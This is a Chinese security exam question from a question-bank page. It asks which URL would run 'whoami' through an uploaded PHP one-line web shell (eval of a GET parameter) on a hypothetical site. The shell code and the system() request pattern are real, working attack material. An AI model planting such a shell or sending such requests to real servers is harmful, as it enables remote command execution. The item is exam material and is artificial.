单选题

假设某网站www.exploit.com存在文件上传漏洞，php语言编写，...

发布于 2022-03-02 17:07:27

假设某网站www.exploit.com存在文件上传漏洞，php语言编写，根目录是C:\wwwroot，现构造文件名test.php上传到服务器目录C:\wwwroot\upload下，内容为

<?php @eval($_GET['cmd'])?>

，请问下面的哪条url能够在服务器成功执行whoami命令？

A. http://www.exploit.com/upload/test.php?cmd=system('whoami')

B. http://www.exploit.com/test.php?cmd=system('whoami')

C. http://www.exploit.com/upload/test.php?cmd=whoami

D. http://www.exploit.com/upload/test.php?eval=system('whoami')

登录后免费查看答案

关注者

被浏览

1 个回答

相关试卷

知识点

面圈网VIP题库全新上线，海量真题题库资源。 90大类考试，超10万份考试真题开放下载啦